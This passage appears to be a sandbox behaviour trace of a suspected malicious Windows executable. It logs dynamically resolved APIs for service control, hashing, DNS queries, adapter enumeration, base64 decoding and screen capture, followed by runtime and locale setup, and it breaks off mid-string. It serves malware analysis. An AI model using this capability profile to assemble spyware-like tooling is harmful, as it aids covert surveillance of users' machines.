lpProcName="OpenServiceW") returned 0x7771ca4c [0064.080] GetProcAddress (hModule=0x77710000, lpProcName="OpenSCManagerW") returned 0x7771ca64 [0064.080] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextW") returned 0x7771df14 [0064.080] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetHashParam") returned 0x7771df7e [0064.080] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0066.943] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetPathFromIDListW") returned 0x75a617bf [0066.944] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetSpecialFolderLocation") returned 0x75a5e141 [0066.944] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteA") returned 0x75c17078 [0066.944] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0066.944] GetProcAddress (hModule=0x759d0000, lpProcName="CommandLineToArgvW") returned 0x759e9ee8 [0066.944] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathA") returned 0x75ae7804 [0066.944] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76620000 [0066.944] GetProcAddress (hModule=0x76620000, lpProcName="CoInitialize") returned 0x7663b636 [0066.945] GetProcAddress (hModule=0x76620000, lpProcName="CoInitializeSecurity") returned 0x76647259 [0066.945] GetProcAddress (hModule=0x76620000, lpProcName="CoUninitialize") returned 0x766686d3 [0066.945] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstance") returned 0x76669d0b [0066.945] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76e40000 [0066.945] GetProcAddress (hModule=0x76e40000, lpProcName=0x6) returned 0x76e43e59 [0066.945] GetProcAddress (hModule=0x76e40000, lpProcName=0x8) returned 0x76e43ed5 [0066.945] GetProcAddress (hModule=0x76e40000, lpProcName=0x9) returned 0x76e43eae [0066.946] GetProcAddress (hModule=0x76e40000, lpProcName=0xc8) returned 0x76e43f21 [0066.946] GetProcAddress (hModule=0x76e40000, lpProcName=0xca) returned 0x76e4fd6b [0066.946] GetProcAddress (hModule=0x76e40000, lpProcName=0xc9) returned 0x76e44af8 [0066.946] GetProcAddress (hModule=0x76e40000, lpProcName=0xc) returned 0x76e45dee [0066.946] GetProcAddress (hModule=0x76e40000, lpProcName=0x2) returned 0x76e44642 [0066.946] LoadLibraryA (lpLibFileName="IPHLPAPI.DLL") returned 0x75550000 [0067.295] GetProcAddress (hModule=0x75550000, lpProcName="GetAdaptersInfo") returned 0x75559263 [0067.295] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x77230000 [0067.651] GetProcAddress (hModule=0x77230000, lpProcName=0xc) returned 0x7723b131 [0067.651] GetProcAddress (hModule=0x77230000, lpProcName=0xb) returned 0x7723311b [0067.651] GetProcAddress (hModule=0x77230000, lpProcName=0x34) returned 0x77247673 [0067.651] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x754f0000 [0068.010] GetProcAddress (hModule=0x754f0000, lpProcName="DnsFree") returned 0x754f436b [0068.010] GetProcAddress (hModule=0x754f0000, lpProcName="DnsQuery_W") returned 0x7550572c [0068.011] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x77550000 [0068.011] GetProcAddress (hModule=0x77550000, lpProcName="CryptStringToBinaryA") returned 0x77585d77 [0068.011] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0068.011] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteObject") returned 0x770b5689 [0068.011] GetProcAddress (hModule=0x770a0000, lpProcName="GetObjectA") returned 0x770b85d4 [0068.011] GetProcAddress (hModule=0x770a0000, lpProcName="SelectObject") returned 0x770b4f70 [0068.011] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0068.011] GetProcAddress (hModule=0x770a0000, lpProcName="GetBitmapBits") returned 0x770bc155 [0068.012] GetProcAddress (hModule=0x770a0000, lpProcName="BitBlt") returned 0x770b5ea6 [0068.012] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteDC") returned 0x770b58b3 [0068.012] GetProcAddress (hModule=0x770a0000, lpProcName="CreateDCA") returned 0x770b7bcc [0068.012] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleDC") returned 0x770b54f4 [0068.012] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleBitmap") returned 0x770b5f49 [0068.012] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x75430000 [0068.580] GetProcAddress (hModule=0x75430000, lpProcName="atexit") returned 0x7544c544 [0068.580] atexit (param_1=0x6090920) returned 0 [0068.580] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18eda0 | out: lpSystemTimeAsFileTime=0x18eda0*(dwLowDateTime=0xcfe36e00, dwHighDateTime=0x1d6d58a)) [0068.580] GetCurrentThreadId () returned 0xa90 [0068.580] GetCurrentProcessId () returned 0xa94 [0068.580] QueryPerformanceCounter (in: lpPerformanceCount=0x18ed98 | out: lpPerformanceCount=0x18ed98*=18875417432) returned 1 [0068.581] GetStartupInfoW (in: lpStartupInfo=0x18ed30 | out: lpStartupInfo=0x18ed30*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x76d43519, hStdOutput=0x77c5fd35, hStdError=0x77cc7daf)) [0068.581] GetProcessHeap () returned 0x4a00000 [0068.581] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0068.581] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0068.581] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0068.582] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0068.582] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0068.582] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0068.582] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0068.582] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0068.582] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0068.582] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0068.582] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0068.583] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0068.583] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0068.583] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0068.583] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0068.583] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0068.583] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0068.584] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0068.584] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0068.584] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0068.584] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0068.584] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0068.584] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0068.584] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0068.585] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0068.585] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0068.585] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0068.585] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0068.585] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0068.585] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0068.585] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0068.585] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0068.586] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0068.586] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0068.586] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x3bc) returned 0x4a1f1c8 [0068.586] GetCurrentThreadId () returned 0xa90 [0068.586] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0x18) returned 0x4a14248 [0068.586] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x800) returned 0x4a1f590 [0068.587] GetStartupInfoW (in: lpStartupInfo=0x18ed00 | out: lpStartupInfo=0x18ed00*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0xab25b81e, hStdError=0x58)) [0068.587] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0068.587] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0068.587] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0068.587] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe\" " [0068.587] GetEnvironmentStringsW () returned 0x4a1fd98* [0068.587] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0xaca) returned 0x4a20870 [0068.587] FreeEnvironmentStringsW (penv=0x4a1fd98) returned 1 [0068.587] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oqrosnesyxcditex.exe")) returned 0x3a [0068.587] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0x7e) returned 0x4a1fd98 [0068.588] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x98) returned 0x4a1fe20 [0068.588] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x3e) returned 0x4a14bb0 [0068.588] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x6c) returned 0x4a1fec0 [0068.588] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x6e) returned 0x4a1ff38 [0068.588] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x78) returned 0x4a11648 [0068.588] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x62) returned 0x4a1ffb0 [0068.588] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x2e) returned 0x4a1af20 [0068.588] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x48) returned 0x4a172a0 [0068.588] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x28) returned 0x4a1a8a8 [0068.588] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x1a) returned 0x4a1eec8 [0068.588] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x4a) returned 0x4a20020 [0068.588] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x72) returned 0x4a116c8 [0068.588] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x30) returned 0x4a1af58 [0068.588] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x2e) returned 0x4a1af90 [0068.588] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x1c) returned 0x4a1eef0 [0068.588] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0xd2) returned 0x4a20078 [0068.588] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x7c) returned 0x4a20158 [0068.588] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x36) returned 0x4a201e0 [0068.588] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x3a) returned 0x4a14bf8 [0068.588] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x90) returned 0x4a20220 [0068.588] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x24) returned 0x4a1a8d8 [0068.588] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x30) returned 0x4a1afc8 [0068.588] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x36) returned 0x4a202b8 [0068.588] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x48) returned 0x4a172f0 [0068.588] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x52) returned 0x4a202f8 [0068.588] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x3c) returned 0x4a14c40 [0068.588] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x82) returned 0x4a20358 [0068.588] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x2e) returned 0x4a1b000 [0068.589] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x1e) returned 0x4a1ef18 [0068.589] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x2c) returned 0x4a1b038 [0068.589] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x54) returned 0x4a203e8 [0068.589] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x52) returned 0x4a20448 [0068.589] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x2a) returned 0x4a1b070 [0068.589] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x3c) returned 0x4a14c88 [0068.589] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x54) returned 0x4a204a8 [0068.589] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x24) returned 0x4a1a908 [0068.589] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x30) returned 0x4a1b0a8 [0068.589] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x8c) returned 0x4a20508 [0068.589] HeapFree (in: hHeap=0x4a00000, dwFlags=0x0, lpMem=0x4a20870 | out: hHeap=0x4a00000) returned 1 [0068.590] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x800) returned 0x4a205a0 [0068.590] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x8, Size=0x80) returned 0x4a20da8 [0068.590] GetLastError () returned 0x0 [0068.590] SetLastError (dwErrCode=0x0) [0068.590] GetLastError () returned 0x0 [0068.590] SetLastError (dwErrCode=0x0) [0068.590] GetLastError () returned 0x0 [0068.590] SetLastError (dwErrCode=0x0) [0068.590] GetACP () returned 0x4e4 [0068.590] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0x220) returned 0x4a20e30 [0068.590] GetLastError () returned 0x0 [0068.590] SetLastError (dwErrCode=0x0) [0068.590] IsValidCodePage (CodePage=0x4e4) returned 1 [0068.590] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18ecf4 | out: lpCPInfo=0x18ecf4) returned 1 [0068.590] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18e7bc | out: lpCPInfo=0x18e7bc) returned 1 [0068.590] GetLastError () returned 0x0 [0068.590] SetLastError (dwErrCode=0x0) [0068.590] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18ebd0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0068.590] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18ebd0, cbMultiByte=256, lpWideCharStr=0x18e538, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0068.591] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpCharType=0x18e7d0 | out: lpCharType=0x18e7d0) returned 1 [0068.591] GetLastError () returned 0x0 [0068.591] SetLastError (dwErrCode=0x0) [0068.591] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18ebd0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0068.591] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18ebd0, cbMultiByte=256, lpWideCharStr=0x18e508, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0068.591] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0068.591] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x18e2f8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0068.591] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18ead0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ®¹%«\x0cí\x18", lpUsedDefaultChar=0x0) returned 256 [0068.591] GetLastError () returned 0x0 [0068.591] SetLastError (dwErrCode=0x0) [0068.591] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18ebd0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0068.591] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18ebd0, cbMultiByte=256, lpWideCharStr=0x18e528, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꥊBĀ") returned 256 [0068.591] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꥊBĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0068.592] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꥊBĀ", cchSrc=256, lpDestStr=0x18e318, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 